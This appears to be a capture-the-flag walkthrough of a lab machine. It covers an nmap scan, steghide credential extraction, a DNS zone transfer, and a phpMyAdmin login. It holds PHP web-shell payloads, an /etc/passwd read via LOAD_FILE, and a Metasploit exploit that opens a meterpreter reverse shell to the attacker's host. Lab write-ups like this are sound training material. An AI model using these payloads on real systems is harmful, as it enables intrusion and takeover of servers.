.
┌─[✗]─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat allports.nmap # Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57 Nmap scan report for mortysserver.com (10.150.150.57) Host is up (0.031s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA) | 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA) |_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519) 53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.16.1-Ubuntu 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds ┌─[user@parrot-virtual]─[~/ptd/morty]
.
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $curl http://10.150.150.57/note.html Morty, <br> if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!! <br> -Rick ┌─[user@parrot-virtual]─[~/ptd/morty]
.add 10.150.150.57 mortyserver to /etc/hosts
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat secret.txt Fl4sk#! ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $md5sum screen.jpeg df7eb9983c329c32408c5a6be270b3f1 screen.jpeg ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $steghide --info screen.jpeg "screen.jpeg": format: jpeg capacity: 10.4 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "keytotheuniverse.txt": size: 24.0 Byte encrypted: rijndael-128, cbc compressed: yes ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $steghide extract -sf screen.jpeg Enter passphrase: Fl4sk#! wrote extracted data to "keytotheuniverse.txt". ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $ls -la total 212 drwxr-xr-x 1 user user 108 Mar 11 11:12 . drwxr-xr-x 1 user user 2164 Mar 5 15:10 .. -rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap -rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt -rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg -rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $cat keytotheuniverse.txt rick:WubbaLubbaDubDub1!
.
┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $dig axfr @10.150.150.57 ; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 ; (1 server found) ;; global options: +cmd ;; Query time: 33 msec ;; SERVER: 10.150.150.57#53(10.150.150.57) ;; WHEN: Fri Mar 12 11:46:00 GMT 2021 ;; MSG SIZE rcvd: 56 ┌─[user@parrot-virtual]─[~/ptd/morty] └──╼ $dig axfr @10.150.150.57 mortysserver.com ; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com ; (1 server found) ;; global options: +cmd mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900 mortysserver.com. 900 IN NS 10.150.150.57. rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57 mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900 ;; Query time: 29 msec ;; SERVER: 10.150.150.57#53(10.150.150.57) ;; WHEN: Fri Mar 12 11:47:13 GMT 2021 ;; XFR size: 4 records (messages 1, bytes 212) ┌─[user@parrot-virtual]─[~/ptd/morty]
We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com
.
We access http://rickscontrolpanel.mortysserver.com
and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2
We logon to this phpmyadmin site as rick:WubbaLubbaDubDub1!
and find
FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251
.
in phpmyadmin create database 1st, then execute query :
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
.
we get
Error SQL query: Documentation SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php" MySQL said: Documentation #1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")
.So we can’t write there ( writing in \tmp is allowed )
.
.
SELECT LOAD_FILE (‘/etc/passwd’);
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false bind:x:112:118::/var/cache/bind:/usr/sbin/nologin mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
wappalyzer shows phpmyadmin = version 4.8.1
We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server
or use metesploit module : multi/http/phpmyadmin_lfi_rce
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options Module options (exploit/multi/http/phpmyadmin_lfi_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD WubbaLubbaDubDub1! no Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.150.150.57 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base phpMyAdmin directory path USERNAME rick yes Username to authenticate with VHOST rickscontrolpanel.mortysserver.com no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.66.66.42 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.66.66.42:4444 msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57 [*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000 msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/linux www-data (33) @ morty 10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57) msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 9802 created. Channel 0 created. cd user/morty cat FLAG3.txt 73ce6cecfc1109f1e43d379fd9922dcc699af321
Later found the i could write to
echo '<?php system($_GET['cmd']); ?>' > shell.php pwd /var/www/html/rickscontrolpanel/public_html/phpmyadmin
and then access
http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami
Author : Puckiestyle